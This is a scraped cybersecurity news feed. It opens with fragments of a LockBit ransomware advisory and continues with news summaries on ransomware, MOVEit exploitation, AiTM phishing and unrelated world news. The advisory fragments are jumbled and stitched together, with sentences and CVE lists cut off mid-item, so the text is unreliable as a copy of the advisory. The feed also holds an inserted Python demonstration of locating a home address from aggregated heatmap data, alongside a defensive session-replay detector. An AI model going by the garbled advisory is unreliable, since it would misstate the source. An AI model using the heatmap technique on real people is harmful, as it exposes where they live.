                The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international partners, hereafter referred to as “authoring organizations,” are releasing this Cybersecurity Advisory (CSA) detailing observed activity in LockBit ransomware incidents and providing recommended mitigations to enable network defenders to proactively improve their organization’s defenses against this ransomware operation. 

                • Australian Cyber Security Centre (ACSC)
                • Canadian Centre for Cyber Security (CCCS)
                • United Kingdom’s National Cyber Security Centre (NCSC-UK)
                • National Cybersecurity Agency of France (ANSSI)
                • Germany’s Federal Office for Information Security (BSI)
                • New Zealand’s Computer Emergency Response Team (CERT NZ) and National Cyber Security Centre (NCSC NZ) 

                The authoring organizations encourage the implementation of the recommendations found in this CSA to reduce the likelihood and impact of future ransomware incidents.

                Autosummary: PaperCut MF/NG Improper Access Control Vulnerability. LockBit affiliates have been documented exploiting numerous CVEs, including: CVE-2021-44228: Apache Log4j2 Remote Code Execution Vulnerability; CVE-2021-22986: F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability; CVE-2020-1472: NetLogon Privilege Escalation Vulnerability; CVE-2019-0708: Microsoft Remote Desktop Services Remote Code Execution Vulnerability; and CVE-2018-13379:

                Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation.[1] A RaaS cybercrime group maintains the functionality of a particular ransomware variant, sells access to that ransomware variant to individuals or groups of operators (often referred to as “affiliates”), and supports affiliates’ deployment of their ransomware in exchange for upfront payment, subscription fees, a cut of profits, or a combination of upfront payment, subscription fees, and a cut of profits.

                Table 3: ANSSI-Observed LockBit Strain and Number of Instances

                Name of the Strain*            Number of Instances
                LockBit 2.0 (LockBit Red)      26
                LockBit 3.0 (LockBit Black)    23
                LockBit                        21
                LockBit Green                  1
                LockBit (pre-encryption)       1
                Total                          72**

                * Name either obtained from ANSSI’s or the victim’s investigations
                ** Includes incidents with multiple strains

                Figure 1: ANSSI-Observed LockBit Strains by Year. From the incidents handled, ANSSI can infer that LockBit 3.0 widely took over from LockBit 2.0 and the original LockBit strain from 2022.

                Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.

                In the Initial Access phase, mitigations working together to deny an attacker network access include securing internet-exposed services, patching devices, implementing MFA, disabling macros, employing application allowlisting, and using logging and alerting.

                LockBit Statistics. Percentage of ransomware incidents attributed to LockBit: Australia: From April 1, 2022, to March 31, 2023, LockBit made up 18% of total reported Australian ransomware incidents.[7] April 2023: LockBit ransomware encryptors targeting macOS seen on VirusTotal.[8, 9] LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker are still available for affiliates’ use on LockBit’s panel.

                Defense Evasion: Apply local security policies to control application execution (e.g., Software Restriction Policies (SRP), AppLocker, Windows Defender Application Control (WDAC)) with a strict allowlist.

                Critical Controls Key. Figure 3: Stopping Ransomware Using Layered Mitigations.

                Validate Security Controls: In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.

                United States: In 2022, 16% of the State, Local, Tribal, and Territorial (SLTT) government ransomware incidents reported to the MS-ISAC were identified as LockBit attacks. This included ransomware incidents impacting municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).

                Table 2: ANSSI-Observed LockBit vs. Overall Ransomware Activity

                Year                 Number of Incidents    Percentage of CERT-FR’s Ransomware-Related Activity
                2020 (from July)     4                      2%
                2021                 20                     10%
                2022                 30                     27%
                2023                 15                     27%
                Total (2020-2023)    69                     11%

                Table 3 shows the number of instances different LockBit strains were observed by ANSSI from July 2020 to present.

                Impact: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud). T1048 Exfiltration Over Alternative Protocol.

                Common Vulnerabilities and Exposures (CVEs) Exploited: Based on secondary sources, it was noted that affiliates exploit older vulnerabilities like CVE-2021-22986, F5 iControl REST unauthenticated Remote Code Execution Vulnerability, as well as newer vulnerabilities such as: CVE-2023-0669:

                Impair Defenses: Disable or Modify Tools (T1562.001): LockBit 3.0 affiliates use Backstab, Defender Control, GMER, PCHunter, PowerTool, Process Hacker or TDSSKiller to disable EDR processes and services. In particular, you can no longer use New Technology Local Area Network (LAN) Manager (NTLM) classic authentication single sign-on, Kerberos unconstrained delegation, as well as Data Encryption Standard (DES) encryption.

                System Information Discovery (T1082): LockBit affiliates will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. When repurposed by LockBit, these tools are then used for a range of malicious cyber activity, such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration.

                In the Consolidation and Preparation phase, mitigations working together to keep an attacker from accessing network devices are patching devices, using network segmentation, enforcing the principle of least privilege, implementing MFA, and using logging and alerting.

                References
                [1] LockBit, BlackCat, and Royal Dominate the Ransomware Scene
                [2] Ransomware Diaries: Volume 1
                [3] What is LockBit ransomware and how does it operate?

                (MFA) for all services to the extent possible, particularly for webmail, virtual private networks, and privileged accounts that access critical systems [CPG 2.H]. with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST standards for developing and managing password policies [CPG 2.L]. For example, account use policies are mitigations for initial access, persistence, privilege escalation, and credential access but would be listed under initial access mitigations.

                Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002): LockBit affiliates use (1) Rclone, an open-source command line cloud storage manager, or FreeFileSync to exfiltrate and (2) MEGA, a publicly available file sharing service, for data exfiltration.

                Table 15: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Exfiltration

                Technique Title    ID        Use
                Exfiltration       TA0010    LockBit affiliates use StealBit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.


                Week in review: 9 free cybersecurity whitepapers, Patch Tuesday forecast

                ciber
                2023-06-11 https://www.helpnetsecurity.com/2023/06/11/week-in-review-9-free-cybersecurity-whitepapers-patch-tuesday-forecast/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Cl0p announces rules for extortion negotiation after MOVEit hack The Cl0p cyber extortion crew says that the many organizations whose data they have pilfered by exploiting a vulnerability in the MOVEit Transfer solution have until June 14 to get in contact with them – or they will post their name on their dedicated leak page. 0mega ransomware gang changes tactics … More

                The post Week in review: 9 free cybersecurity whitepapers, Patch Tuesday forecast appeared first on Help Net Security.

                Autosummary: Introducing the book: Creating a Small Business Cybersecurity Program, Second Edition. In this Help Net Security video interview, Alan Watkins, CIS Controls Ambassador, CIS, talks about his new book – Creating a Small Business Cybersecurity Program, Second Edition. New infosec products of the week: June 9, 2023. Here’s a look at the most interesting products from the past week, featuring releases from 1Password, Datadog, Enveedo, Lacework, and NinjaOne.


                Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC

                rusia-ucrania
                2023-06-11 https://securityaffairs.com/147307/hacktivism/cyber-anarchy-squad-hacks-infotel-jsc.html

                Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC. The company provides connectivity services to the Russian banking system; for this reason, the attack had a severe impact on the operations of […]

                The post Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC appeared first on Security Affairs.

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, cyberattack)


                Strava heatmap feature can be abused to find home addresses

                financial
                2023-06-11 https://www.bleepingcomputer.com/news/security/strava-heatmap-feature-can-be-abused-to-find-home-addresses/
                Researchers at the North Carolina State University Raleigh have discovered a privacy risk in the Strava app's heatmap feature that could lead to identifying users' home addresses. [...]

                Autosummary: In 2018, Strava implemented a feature called "heatmap" that anonymously aggregates users' (runners, cyclists, hikers) activity to help users find trails or exercise hotspots, meet like-minded individuals, and perform their sessions in more crowded and safer locations.
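                Why an aggregated, identifier-free heatmap can still give away a home, as an added illustration (this is not the researchers' method, which the summary does not describe, and not Strava code). It assumes one thing the summary does not state: that a person's runs start and end at home, so every track passes through the same map cell. The tracks, the home coordinates and the grid size are constructed for the example. It also shows what trimming the first and last points of each track (the idea behind a privacy zone) does to that cell.

```python
import math
import random
from collections import Counter

CELL = 0.001  # assumed grid cell size in degrees, roughly 100 m at mid-latitudes


def cell_of(point):
    """Map a (lat, lon) point to its grid cell."""
    lat, lon = point
    return (math.floor(lat / CELL), math.floor(lon / CELL))


def make_tracks(home, n_activities, seed=1):
    """Constructed sample data: out-and-back runs that start and end at
    `home`, each along a random bearing, one point per cell-sized step."""
    rng = random.Random(seed)
    tracks = []
    for _ in range(n_activities):
        bearing = rng.uniform(0, 2 * math.pi)
        steps = rng.randint(20, 40)
        outbound = [(home[0] + i * CELL * math.sin(bearing),
                     home[1] + i * CELL * math.cos(bearing)) for i in range(steps)]
        tracks.append(outbound + outbound[::-1])  # run out, then back home
    return tracks


def heatmap(tracks):
    """Aggregate heat per cell: every point of every track, with no user or
    activity identifiers, which is all a public heatmap exposes."""
    return Counter(cell_of(p) for track in tracks for p in track)


def hottest_cell(heat):
    """The cell with the most points; with out-and-back tracks it is home."""
    return heat.most_common(1)[0][0]


def trim_endpoints(tracks, k):
    """Mitigation: drop the first and last k points of each track before
    aggregating, the idea behind a privacy zone around start and end."""
    return [t[k:len(t) - k] for t in tracks if len(t) > 2 * k]


if __name__ == "__main__":
    home = (35.7705, -78.6405)  # assumed home coordinates, placed at a cell centre
    tracks = make_tracks(home, 30)
    heat = heatmap(tracks)
    print("home cell:", cell_of(home), "hottest cell:", hottest_cell(heat),
          "points there:", heat[cell_of(home)])
    trimmed = heatmap(trim_endpoints(tracks, 5))
    print("home cell present after trimming 5 points per end:", cell_of(home) in trimmed)
```

                Trimming removes the hub but leaves a ring of start points at the trim radius, which is itself a hint about the centre; that is why the other usual control is a minimum count of distinct contributors per cell before it is rendered at all.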


                Microsoft warns of multi-stage AiTM phishing and BEC attacks

                financial
                2023-06-11 https://securityaffairs.com/147327/hacking/aitm-bec-attacks.html

                Microsoft researchers warn of banking adversary-in-the-middle (AitM) phishing and BEC attacks targeting banking and financial organizations. Microsoft discovered multi-stage adversary-in-the-middle (AiTM) phishing and business email compromise (BEC) attacks against banking and financial services organizations. In AiTM phishing, threat actors set up a proxy server between a target user and the website the user wishes to […]

                The post Microsoft warns of multi-stage AiTM phishing and BEC attacks appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cyberattack) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                How 4 children survived 40 days in hostile Colombian jungle

                latam
                2023-06-11 https://www.bbc.co.uk/news/world-europe-65871238?at_medium=RSS&at_campaign=KARANGA
                The youngsters defied the odds in a part of the Amazon rainforest home to jaguars and wild dogs.


                Colombia plane crash: Four children found alive in Amazon after 40 days

                latam
                2023-06-10 https://www.bbc.co.uk/news/world-latin-america-65864158?at_medium=RSS&at_campaign=KARANGA
                It is a "magical day", says the president, as the four siblings are found after 40 days missing.


                The University of Manchester suffered a cyber attack and suspects a data breach

                financial
                2023-06-10 https://securityaffairs.com/147290/data-breach/university-of-manchester-cyber-attack.html

                The University of Manchester suffered a cyberattack; attackers likely stole staff and students’ data from its systems. The University of Manchester, one of the UK’s largest educational institutions, suffered a cyberattack, and the university suspects that the threat actors have stolen data from its systems. The University of Manchester has about 11,000 staff and more […]

                The post The University of Manchester suffered a cyber attack and suspects a data breach appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cyberattack) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Watch: How Colombia children jungle rescue unfolded

                latam
                2023-06-10 https://www.bbc.co.uk/news/world-latin-america-65865902?at_medium=RSS&at_campaign=KARANGA
                Four children have been found alive, weeks after a plane crash in the Amazon jungle.


                Colombia plane crash: Children reunited with family after 40 days in Amazon

                latam
                2023-06-10 https://www.bbc.co.uk/news/world-latin-america-65869284?at_medium=RSS&at_campaign=KARANGA
                The children have begun playing again in hospital, officials say, as the eldest is praised for her care.


                Colombia plane crash: The clues that helped find the children

                latam
                2023-06-10 https://www.bbc.co.uk/news/in-pictures-65864784?at_medium=RSS&at_campaign=KARANGA
                Clues including footprints and partially eaten fruit led rescuers to four children missing in the Amazon.


                Employee cybersecurity awareness takes center stage in defense strategies

                ciber
                2023-06-09 https://www.helpnetsecurity.com/2023/06/09/employees-cybersecurity-knowledge/

                As cyberattacks intensify, more and more organizations recognize the need to have a strong security culture for all employees, according to Fortinet. Employee cybersecurity awareness The most recent report from Fortinet’s FortiGuard Labs found that ransomware threats remain at peak levels with no evidence of slowing down globally. At the same time, Fortinet found that 84% of organizations experienced one or more breaches in 2022. The latest research from Fortinet reveals that more than 90% … More

                The post Employee cybersecurity awareness takes center stage in defense strategies appeared first on Help Net Security.

                "

                Autosummary: Lack of cybersecurity knowledge among employees 81% of organizations faced malware, phishing, and password attacks last year which mainly were targeted at users. "


                Introducing the book: Creating a Small Business Cybersecurity Program, Second Edition

                ciber
                2023-06-09 https://www.helpnetsecurity.com/2023/06/09/book-creating-a-small-business-cybersecurity-program-second-edition-video/

                In this Help Net Security video interview, Alan Watkins, CIS Controls Ambassador, CIS, talks about his new book – Creating a Small Business Cybersecurity Program, Second Edition. This book provides guidance and essential steps small businesses with 25-50 employees should implement, from creating governance documents to policies and procedures. Watkins devotes four chapters to the CIS Controls and CIS Safeguards in Implementation Group 1 (IG1) and discusses risk management using the CIS Risk Assessment Method … More

                The post Introducing the book: Creating a Small Business Cybersecurity Program, Second Edition appeared first on Help Net Security.

                "

                Autosummary: "


                Watch: Driving test ends with crash into lamp-post in Argentina

                latam
                2023-06-09 https://www.bbc.co.uk/news/world-latin-america-65852316?at_medium=RSS&at_campaign=KARANGA
                CCTV has captured a driving test gone wrong in the Argentinian city of Lanus.


                Russians charged with hacking Mt. Gox crypto exchange, running BTC-e

                rusia-ucrania
                2023-06-09 https://www.bleepingcomputer.com/news/security/russians-charged-with-hacking-mt-gox-crypto-exchange-running-btc-e/
                Russian nationals Alexey Bilyuchenko and Aleksandr Verner have been charged with the 2011 hacking of the leading (at the time) cryptocurrency exchange Mt. Gox and the laundering of around 647,000 bitcoins they stole. [...]


                BlackCat ransomware fails to extort Australian commercial law giant

                exploits ransomware
                2023-06-09 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-fails-to-extort-australian-commercial-law-giant/
                Australian law firm HWL Ebsworth confirmed to local media outlets that its network was hacked after the ALPHV ransomware gang began leaking data they claim was stolen from the company. [...]


                Guardz launches AI-powered Multilayered Phishing Protection to secure SMEs

                financial
                2023-06-09 https://www.helpnetsecurity.com/2023/06/09/guardz-multilayered-phishing-protection/

                Guardz has unveiled a new AI-powered Multilayered Phishing Protection solution to help small and medium-sized enterprises (SMEs) and managed service providers (MSPs) prevent phishing attacks before their security is compromised. The solution uses AI to provide small businesses and the MSPs that support them with automatic detection and remediation capabilities to protect against phishing attacks – the number one threat they face. By combining email security, web browsing protection, perimeter posture, and awareness culture in … More

                The post Guardz launches AI-powered Multilayered Phishing Protection to secure SMEs appeared first on Help Net Security.

                "

                Autosummary: "


                Japanese Pharmaceutical giant Eisai hit by a ransomware attack

                exploits ransomware
                2023-06-09 https://securityaffairs.com/147276/cyber-crime/eisai-ransomware-attack.html

                This week, the Japanese pharmaceutical giant Eisai has taken its systems offline in response to a ransomware attack. Eisai is a Japanese pharmaceutical company with about 10,000 employees and more than $5 billion in revenue. The company this week was forced to take certain systems offline in response to a cyber attack. In response to the ransomware […]

                The post Japanese Pharmaceutical giant Eisai hit by a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Clop ransomware gang was testing MOVEit Transfer bug since 2021

                exploits ransomware
                2023-06-09 https://securityaffairs.com/147264/cyber-crime/clop-testing-moveit-transfer-bug-2021.html

                Researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll investigated the exploitation attempts for the MOVEit Transfer vulnerability and discovered that Clop threat […]

                The post Clop ransomware gang was testing MOVEit Transfer bug since 2021 appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Clop ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Kroll assesses with high confidence that the MOVEit Transfer exploit as it exists today: Was available and being used/tested in April 2022 Was available and being used/tested in July 2021″ This week, the Clop ransomware group claimed to have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer software. "


                University of Manchester says hackers ‘likely’ stole data in cyberattack

                ciber
                2023-06-09 https://www.bleepingcomputer.com/news/security/university-of-manchester-says-hackers-likely-stole-data-in-cyberattack/
                The University of Manchester warns staff and students that they suffered a cyberattack where threat actors likely stole data from the University's network. [...]

                Autosummary: The University says they informed all relevant authorities, including the Information Commissioner's Office, the National Cyber Security Centre (NCSC), and the National Crime Agency, about the security and data breach.


                Microsoft Uncovers Banking AitM Phishing and BEC Attacks Targeting Financial Giants

                financial
                2023-06-09 https://thehackernews.com/2023/06/microsoft-uncovers-banking-aitm.html
                Banking and financial services organizations are the targets of a new multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) attack, Microsoft has revealed. "The attack originated from a compromised trusted vendor and transitioned into a series of AiTM attacks and follow-on BEC activity spanning multiple organizations," the tech giant disclosed in a Thursday [...]

                Autosummary: "This attack shows the complexity of AiTM and BEC threats, which abuse trusted relationships between vendors, suppliers, and other partner organizations with the intent of financial fraud," the company added.
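                Both AiTM items above (the Security Affairs and The Hacker News entries) describe the same mechanism: the victim signs in through the attacker's proxy, which relays the real login page, captures the session cookie issued after MFA, and lets the attacker replay it from their own infrastructure. The following is an added example, not code from Microsoft or from either article, of the simplest trace that mechanism leaves in identity logs: one session used from a second source IP shortly after the MFA success that created it. The log format, field names, IP addresses and events are constructed for the example; real tenant sign-in logs carry the same information under other names.

```python
"""Flag sessions whose cookie is reused from a second network shortly
after MFA, a common trace of AiTM phishing followed by BEC activity."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not a real product's schema), one event per line:
# timestamp | user | session_id | source_ip | event
SAMPLE_LOG = """\
2023-06-08T09:00:05Z|alice@example.com|sess-1a2b|203.0.113.10|mfa_success
2023-06-08T09:00:09Z|alice@example.com|sess-1a2b|203.0.113.10|mailbox_read
2023-06-08T09:03:41Z|alice@example.com|sess-1a2b|198.51.100.77|mailbox_read
2023-06-08T09:04:02Z|alice@example.com|sess-1a2b|198.51.100.77|inbox_rule_created
2023-06-08T10:15:00Z|bob@example.com|sess-9f8e|192.0.2.22|mfa_success
2023-06-08T10:16:10Z|bob@example.com|sess-9f8e|192.0.2.22|mailbox_read
"""


def parse_log(text):
    """Parse the pipe-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, sid, ip, event = line.split("|")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user, "sid": sid, "ip": ip, "event": event,
        })
    return events


def find_replayed_sessions(events, window=timedelta(hours=1)):
    """Return {session_id: finding} for sessions that, within `window` of
    their MFA success, were used from a source IP other than the one that
    completed MFA. In an AiTM attack the MFA IP is the phishing proxy and
    the second IP is where the attacker replays the stolen cookie."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["sid"]].append(e)

    findings = {}
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        mfa = next((e for e in evs if e["event"] == "mfa_success"), None)
        if mfa is None:
            continue  # no MFA event captured for this session; nothing to anchor on
        later = [e for e in evs if mfa["ts"] < e["ts"] <= mfa["ts"] + window]
        replayed = [e for e in later if e["ip"] != mfa["ip"]]
        if replayed:
            findings[sid] = {
                "user": mfa["user"],
                "auth_ip": mfa["ip"],
                "replay_ips": sorted({e["ip"] for e in replayed}),
                "post_replay_events": [e["event"] for e in replayed],
            }
    return findings


if __name__ == "__main__":
    for sid, finding in find_replayed_sessions(parse_log(SAMPLE_LOG)).items():
        print(sid, finding)
```

                A second IP on a session is a lead, not a verdict: mobile users change networks too, so in practice the two IPs are enriched with ASN and geolocation, and what the second IP did (mailbox rules, payment-detail changes) is weighed as the BEC follow-on the articles describe.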


                The Week in Ransomware - June 9th 2023 - It’s Clop... Again!

                exploits ransomware
                2023-06-09 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-9th-2023-its-clop-again/
                The week was dominated by fallout over the MOVEit Transfer data-theft attacks, with the Clop ransomware gang confirming that they were behind them. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @demonslay335, @DanielGallagher, @fwosar, @billtoulas, @KrollWire, @Mar_Pich, @RedSenseIntel, @CISAgov, @FBI, @MsftSecIntel, @pcrisk, @TrendMicro, @PogoWasRight, @catabatarce, @GossiTheDog, @BrettCallow, and @uptycs. June 7th 2023: According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer.


                Ukrainian hackers take down service provider for Russian banks

                financial rusia-ucrania Telcos
                2023-06-09 https://www.bleepingcomputer.com/news/security/ukrainian-hackers-take-down-service-provider-for-russian-banks/
                A group of Ukrainian hackers known as the Cyber.Anarchy.Squad claimed an attack that took down Russian telecom provider Infotel JSC on Thursday evening. [...]

                Autosummary: "In total, the company has about four hundred clients, a quarter of them are banks, the rest are credit institutions, car dealerships."


                Ransomware review: June 2023

                exploits
                2023-06-09 https://www.malwarebytes.com/blog/threat-intelligence/2023/06/ransomware-review-june-2023

                Categories: Ransomware, Threat Intelligence

                May saw a record number of 556 reported ransomware victims, the unusual emergence of Italy and Russia as major targets, and a significant rise in attacks on the education sector.

                The post Ransomware review: June 2023 appeared first on Malwarebytes Labs.

                Autosummary: [Chart: Known ransomware attacks against education, June 2022-May 2023] Between June 2022 and May 2023, Vice Society attacked more education targets than any other gang, a specialization that should alarm schools, colleges, and universities everywhere. [Charts: Known ransomware attacks by country, May 2023; Known ransomware attacks by industry sector, May 2023] Italy and Russia emerge as targets: the upswing in ransomware activity in Italy and Russia in May is striking. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. BlackSuit could be a new variant developed by Royal's authors, a mimicry attempt using similar code, an affiliate of the Royal ransomware gang running its own modifications, or even a breakaway group from the Royal ransomware gang. Predominantly targeting small and medium-sized businesses (SMBs), 8Base has attacked mainly companies within the Professional/Scientific/Technical sector, comprising 36% of known attacks, followed by Manufacturing at 17%.


                Update your Cisco System Secure Client now to fix this AnyConnect bug

                exploits
                2023-06-09 https://www.malwarebytes.com/blog/news/2023/06/update-your-cisco-system-secure-client-now-to-fix-this-anyconnect-bug

                Categories: Exploits and vulnerabilities, News
                Tags: Cisco, anyconnect, system secure client, VPN, bug, patch, update, vulnerability, SYSTEM

                We take a look at a recent update for Cisco Secure Client (formerly AnyConnect) and why you should apply the update as soon as possible.

                The post Update your Cisco System Secure Client now to fix this AnyConnect bug appeared first on Malwarebytes Labs.

                Autosummary: The flaw is Windows-only. Cisco has confirmed it does not affect Cisco AnyConnect Secure Mobility Client for Linux, Cisco AnyConnect Secure Mobility Client for MacOS, Cisco Secure Client-AnyConnect for Android, Cisco Secure Client AnyConnect VPN for iOS, Cisco Secure Client for Linux, or Cisco Secure Client for MacOS. This issue has been resolved with the release of Cisco Secure Client for Windows 5.0MR2 and AnyConnect Secure Mobility Client for Windows 4.10MR7.


                Russians charged with hacking Mt. Gox exchange and operating BTC-e

                rusia-ucrania
                2023-06-09 https://securityaffairs.com/147280/digital-id/mt-gox-russian-nations.html

                Two Russian nationals have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and money laundering. Russian nationals Alexey Bilyuchenko (43) and Aleksandr Verner (29) have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and the operation of the illicit cryptocurrency exchange BTC-e. The duo has […]

                The post Russians charged with hacking Mt. Gox exchange and operating BTC-e appeared first on Security Affairs.

                "

                Autosummary: "


                Top factors driving enterprise demand for new cybersecurity technology

                ciber
                2023-06-08 https://www.helpnetsecurity.com/2023/06/08/cybersecurity-vendors-strategies/

                Despite prevailing economic headwinds, the market for cybersecurity products and services remains buoyant, according to CCgroup. The study found that 78% of enterprises in the U.S. and 58% in the UK have increased cybersecurity investment in the last year, while 81% of enterprises are looking to work with new vendors in the next 12 months. The top three solutions for investment are endpoint security, application security and fraud prevention. However, despite searching for new suppliers, … More

                The post Top factors driving enterprise demand for new cybersecurity technology appeared first on Help Net Security.

                "

                Autosummary: Long-form content is crucial to cybersecurity vendors’ content strategies Long-form copy – written either by vendors or industry analysts – proved to be the most popular, with blogs emerging as the winner in both markets (92% in the U.S. and 93% in the UK), followed by industry analyst reports (88% overall) and case studies (87% overall). "


                20 cybersecurity projects on GitHub you should check out

                ciber
                2023-06-08 https://www.helpnetsecurity.com/2023/06/08/github-cybersecurity-projects/

                Open-source GitHub cybersecurity projects, developed and maintained by dedicated contributors, provide valuable tools, frameworks, and resources to enhance security practices. From vulnerability scanning and network monitoring to encryption and incident response, the following collection encompasses a diverse range of projects that can aid individuals and organizations in safeguarding their digital assets. ATT&CK Navigator The ATT&CK Navigator allows users to navigate and annotate ATT&CK matrices, similar to using Excel. It provides a way to visualize defensive … More

                The post 20 cybersecurity projects on GitHub you should check out appeared first on Help Net Security.

                "

                Autosummary: Identification of system vulnerabilities Provides information on the servers that are affected Automated vulnerability detection Regular vulnerability reporting using methods like CRON Wazuh Wazuh is a free and open-source platform that offers threat prevention, detection, and response capabilities. Vuls Vuls is a vulnerability scanner designed for Linux, FreeBSD, Container, WordPress, Programming language libraries, and Network devices. It offers the following features: Clear overview of running processes and resource usage Detailed system information and graphs Views and edits services Other features useful for debugging and analyzing software Tink Tink is an open-source cryptography library developed by Google’s cryptographers and security engineers. It has many advanced features: a completely custom binary template and pattern language to decode and highlight structures in the data, a graphical node-based data processor to pre-process values before they’re displayed, a disassembler, diffing support, bookmarks and much much more.It is designed to provide an initial and rapid assessment of malware samples, URLs, IP addresses, domains, malware families, IOCs, and hashes. The generated output is consolidated into a single CSV timeline, facilitating analysis in popular tools such as LibreOffice, Timeline Explorer, Elastic Stack, Timesketch, and others. "


                Royal ransomware gang adds BlackSuit encryptor to their arsenal

                exploits ransomware
                2023-06-08 https://www.bleepingcomputer.com/news/security/royal-ransomware-gang-adds-blacksuit-encryptor-to-their-arsenal/
                The Royal ransomware gang has begun testing a new encryptor called BlackSuit that shares many similarities with the operation's usual encryptor. [...]

                Autosummary: [Image: BlackSuit ransomware data leak site, source BleepingComputer] However, a rebrand would no longer make sense, as a recent report by Trend Micro has shown clear similarities between the BlackSuit and Royal ransomware encryptors, making it hard to convince anyone that they are a new ransomware operation.


                Cisco fixes privilege escalation bug in Cisco Secure Client

                exploits
                2023-06-08 https://securityaffairs.com/147217/security/cisco-secure-client-privilege-escalation.html

                Cisco addressed a high-severity flaw in Cisco Secure Client that can allow attackers to escalate privileges to the SYSTEM account. Cisco has fixed a high-severity vulnerability, tracked as CVE-2023-20178 (CVSS Score 7.8), found in Cisco Secure Client (formerly AnyConnect Secure Mobility Client) that can be exploited by low-privileged, authenticated, local attacker to escalate privileges to […]

                The post Cisco fixes privilege escalation bug in Cisco Secure Client appeared first on Security Affairs.

                "

                Autosummary: "


                Japanese pharma giant Eisai discloses ransomware attack

                exploits ransomware
                2023-06-08 https://www.bleepingcomputer.com/news/security/japanese-pharma-giant-eisai-discloses-ransomware-attack/
                Pharmaceutical company Eisai has disclosed it suffered a ransomware incident that impacted its operations, admitting that attackers encrypted some of its servers. [...]

                Autosummary: A weekend ransomware attack: in a notification posted to their website, Eisai disclosed that they suffered a ransomware attack over the weekend, a typical time for attackers to deploy encryptors as IT teams are understaffed and unable to respond effectively to the rapidly evolving situation.


                Why cybersecurity needs a conference like mWISE

                ciber
                2023-06-08 https://www.bleepingcomputer.com/news/security/why-cybersecurity-needs-a-conference-like-mwise/
                Mandiant"s mWISE #cybersecurity conference runs from Sept 18-20, 2023 in Washington, D.C. Organizers are asking the public for keynote topic and speaker ideas, and if you register now, you can save 45% off the standard price. [...] "

                Autosummary: Their advice: Think government officials, intelligence experts, and “brain candy”—i.e., whatever challenges thinking, inspires creativity, and/or nurtures mental health.At mWISE, which runs from September 18–20, 2023 in Washington, D.C., frontline security experts from both the public and private sectors will experience a level of collaboration that doesn’t happen elsewhere. "


                Experts Unveil PoC Exploit for Recent Windows Vulnerability Under Active Exploitation

                exploits
                2023-06-08 https://thehackernews.com/2023/06/experts-unveil-poc-exploit-for-recent.html
                Details have emerged about a now-patched actively exploited security flaw in Microsoft Windows that could be abused by a threat actor to gain elevated privileges on affected systems. The vulnerability, tracked as CVE-2023-29336, is rated 7.8 for severity and concerns an elevation of privilege bug in the Win32k component. "An attacker who successfully exploited this vulnerability could gain [...]"


                Clop Ransomware Gang Likely Exploiting MOVEit Transfer Vulnerability Since 2021

                exploits ransomware
                2023-06-08 https://thehackernews.com/2023/06/clop-ransomware-gang-likely-exploiting.html
